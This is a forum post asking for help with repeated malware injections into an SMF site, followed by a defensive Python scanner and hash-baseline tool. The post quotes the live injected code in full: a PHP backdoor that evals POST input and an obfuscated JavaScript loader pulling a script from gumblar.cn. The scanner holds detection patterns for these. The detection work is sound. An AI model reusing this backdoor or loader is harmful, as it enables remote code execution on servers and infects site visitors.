Code keeps getting inserted into my SMF installation (as well as any other PHP, HTML, JS files).
Here's what I've done to prevent things, in addition to upgrading to the latest 1.x SMF:
- Ran rkhunter to confirm that the site hasn't been root-hacked. It hasn't been.
- Upgraded PHP and Apache to the latest stable version of PHP.
- chmodded the files to be read-only, no write.
- Changed my admin password in the SMF software
- Scrambled my passwords for command line and root (that said, no indications exist that someone other than me is logging into either account)
Here's what still happened after I did all of the above:
The following PHP code has been injected into my PHP scripts at least 3 times in the past two weeks. Latest was around 7am server time this morning (more below the excerpt):
<?php
if(!function_exists('tmp_lkojfghx')){
if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBXMW1yZD0nJSc7dmFyIFZrdj11bmVzY2FwZSgoJ3ZhckAyMGFAM2RAMjJTY3JpQDcwdEA0NUA2ZWdANjluZUAyMkAyY2JAM2RAMjJWZXJzaUA2Zm4oQDI5K0AyMkAyY0A2YUAzZEAyMkAyMkAyY0A3NUAzZG5hdkA2OUA2N2F0b3JAMmV1c2VyQWdlbnRAM2JpZigodUAyZWluZEA2NXhANGZmKEAyMldpbkAyMkAyOUAzZTBAMjlAMjZAMjYoQDc1QDJlaUA2ZWRleE9mQDI4QDIyTlRAMjBAMzZAMjIpQDNjMClAMjZAMjZAMjhkb2N1QDZkZW50QDJlY29va2llQDJlQDY5QDZlQDY0ZXhPZihAMjJtQDY5ZWtAM2QxQDIyKUAzY0AzMClAMjZAMjYodHlANzBlb2YoQDdhckA3Nnp0QDczQDI5QDIxQDNkQDc0QDc5cGVvZihAMjJBQDIyKSkpQDdienJ2enRANzNAM2RAMjJANDFAMjJAM2JANjVANzZANjFsQDI4QDIyaWYod0A2OUA2ZWRvQDc3QDJlQDIyK2ErQDIyKUA2YUAzZGorQDIyK2ErQDIyQDRkQDYxQDZhb0A3MkAyMkAyYmJAMmJhK0AyMk1pbm9yQDIyK0A2MitANjErQDIyQDQydWlsZEAyMitiQDJiQDIyakAzYkAyMkAyOUAzYmRANmZjQDc1bWVudEAyZXdyQDY5dEA2NShAMjJAM2NzQDYzckA2OXBANzRAMjBzQDcyY0AzZEAyZkAyZmd1bWJsYUA3MkAyZWNuQDJmckA3M3NAMmZAM2ZANjlkQDNkQDIyK2orQDIyQDNlQDNjQDVjQDJmc2NyaXB0QDNlQDIyKUAzYkA3ZCcpLnJlcGxhY2UoL0AvZyxXMW1yZCkpO2V2YWwoVmt2KX0pKCk7CiAtLT48L3NjcmlwdD4='));
function tmp_lkojfghx($s){
if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}
$s1=preg_replace('#<script language=javascript><!--\ndocument\.write\(unescape\(.+?\n--></script>#','',$s);
if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
return $g?gzencode($s):$s;}
function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();
if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
ob_start('tmp_lkojfghx');
for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2(); ?>
This gets inserted into HTML files:
<script language=javascript><script language=javascript><!--
(function(){var W1mrd='%';var Vkv=unescape(('var@20a@3d@22Scri@70t@45@6eg@69ne@22@2cb@3d@22Versi@6fn(@29+@22@2c@6a@3d@22@22@2c@75@3dnav@69@67ator@2euserAgent@3bif((u@2eind@65x@4ff(@22Win@22@29@3e0@29@26@26(@75@2ei@6edexOf@28@22NT@20@36@22)@3c0)@26@26@28docu@6dent@2ecookie@2e@69@6e@64exOf(@22m@69ek@3d1@22)@3c@30)@26@26(ty@70eof(@7ar@76zt@73@29@21@3d@74@79peof(@22A@22)))@7bzrvzt@73@3d@22@41@22@3b@65@76@61l@28@22if(w@69@6edo@77@2e@22+a+@22)@6a@3dj+@22+a+@22@4d@61@6ao@72@22@2bb@2ba+@22Minor@22+@62+@61+@22@42uild@22+b@2b@22j@3b@22@29@3bd@6fc@75ment@2ewr@69t@65(@22@3cs@63r@69p@74@20s@72c@3d@2f@2fgumbla@72@2ecn@2fr@73s@2f@3f@69d@3d@22+j+@22@3e@3c@5c@2fscript@3e@22)@3b@7d').replace(/@/g,W1mrd));eval(Vkv)})();
--></script>
A very similar chunk of code as the above gets inserted into JS files.
Anyone have thoughts on what steps to take beyond what I've done already?
Here's some stuff that's been reported about this intrusion elsewhere:
http://forums.nasioc.com/forums/showthread.php?p=26537579
http://stackoverflow.com/questions/810402/virus-in-php/818935
Short of ditching everything and finding a new hosting provider, I'm not sure I see anything in the above I haven't done...
Thoughts?
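The injected PHP block quoted above registers itself as an output-buffer handler (ob_start('tmp_lkojfghx')) and as the error handler, and it evaluates whatever arrives in $_POST['tmp_lkojfghx3']. That gives the attacker a code path through the web server itself, independent of SSH or SMF passwords, and if the web-server user owns the files, that same path can chmod them writable again. Two checks that follow directly from the quoted code: look for its markers in every PHP/HTML/JS file, including inside the base64 and '@XX'-escaped layers, and keep a hash baseline of a known-clean tree so the next reinfection is caught even if the markers change. The following Python scanner is an added example, not code from the post or from SMF; the sample files, the clean and injected contents, and the file names are constructed here, and the placeholder payload in the sample only writes a string.

```python
"""Added example, not code from the post: detect the injected blocks quoted
above and catch reinfection with a SHA-256 baseline. Sample files and the
placeholder payload are constructed here."""
import base64
import binascii
import hashlib
import os
import re
import tempfile

# Markers taken from the injected code in the post; none is a legitimate SMF
# symbol, so one hit is enough to pull the file for inspection.
SIGNATURES = {
    "php_backdoor_marker": re.compile(r"tmp_lkojfghx|TMP_XHGFJOKL", re.I),
    "php_post_eval": re.compile(r"eval\s*\(\s*\$_POST\[", re.I),
    "js_unescape_eval": re.compile(r"unescape\(.*?\)\s*;\s*eval\(", re.I | re.S),
    "gumblar_loader": re.compile(r"gumblar\.cn", re.I),
}

def decode_obfuscation(text):
    """Text plus the layers hidden by the two encodings the injection uses:
    base64 inside base64_decode('...') and '@XX' hex escapes in the JS."""
    layers = [text]
    for m in re.finditer(r"base64_decode\('([A-Za-z0-9+/=]+)'\)", text):
        try:
            layers.append(base64.b64decode(m.group(1)).decode("latin-1"))
        except (binascii.Error, ValueError):
            continue
    unhex = lambda m: chr(int(m.group(1), 16))
    layers += [re.sub(r"@([0-9a-fA-F]{2})", unhex, t) for t in layers]
    return "\n".join(layers)

def scan_content(text):
    """Sorted names of the signatures found in any layer of the text."""
    haystack = decode_obfuscation(text)
    return sorted(n for n, rx in SIGNATURES.items() if rx.search(haystack))

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """relative path -> signature names, for every web file with a hit."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    found = scan_content(fh.read())
                if found:
                    hits[os.path.relpath(path, root)] = found
    return hits

def build_baseline(root):
    """relative path -> SHA-256 of every file; take it from a known-clean tree
    and keep it outside the web root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                baseline[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return baseline

def diff_baseline(root, baseline):
    """Files whose hash changed, appeared or vanished since the baseline."""
    cur = build_baseline(root)
    return {"modified": sorted(p for p in cur if p in baseline and cur[p] != baseline[p]),
            "added": sorted(set(cur) - set(baseline)),
            "removed": sorted(set(baseline) - set(cur))}

# Constructed stand-ins for the injected blocks: same markers and encodings as
# the quoted code, but the decoded JS only writes a string and loads nothing.
INJECTED_JS = ("<script language=javascript><!--\n(function(){var W1mrd='%';"
               "var Vkv=unescape(('docu@6dent@2ewrite(@22gumbla@72@2ecn@22)')"
               ".replace(/@/g,W1mrd));eval(Vkv)})();\n--></script>\n")
INJECTED_PHP = ("<?php if(!function_exists('tmp_lkojfghx')){"
                "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);"
                "define('TMP_XHGFJOKL',base64_decode('%s'));} ?>\n"
                % base64.b64encode(INJECTED_JS.encode()).decode())
CLEAN_PHP = "<?php\n// constructed clean file\necho 'hello';\n"
CLEAN_JS = "// constructed clean file\nfunction f(){return 1;}\n"

def demo():
    """Baseline a clean tree, simulate the reinfection, return (diff, hits)."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in {"index.php": CLEAN_PHP, "app.js": CLEAN_JS}.items():
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(body)
        baseline = build_baseline(root)
        assert scan_tree(root) == {}  # clean tree: no hits
        # Reinfection as in the post: PHP block prepended, JS block appended.
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(INJECTED_PHP + CLEAN_PHP)
        with open(os.path.join(root, "app.js"), "a") as fh:
            fh.write(INJECTED_JS)
        return diff_baseline(root, baseline), scan_tree(root)

if __name__ == "__main__":
    changed, hits = demo()
    print("changed since baseline:", changed)
    print("signature hits:", hits)
```

On a real host, run build_baseline() against the web root right after a clean reinstall, store the result as JSON somewhere the web-server user cannot write, and run diff_baseline() plus scan_tree() from cron; the baseline diff is the check that still works once the markers change. Scanning the decoded layers matters because the PHP version of the block carries the JavaScript only as base64, and the JavaScript carries the loader hostname only in '@XX' form, so a plain grep for either string would miss the PHP files.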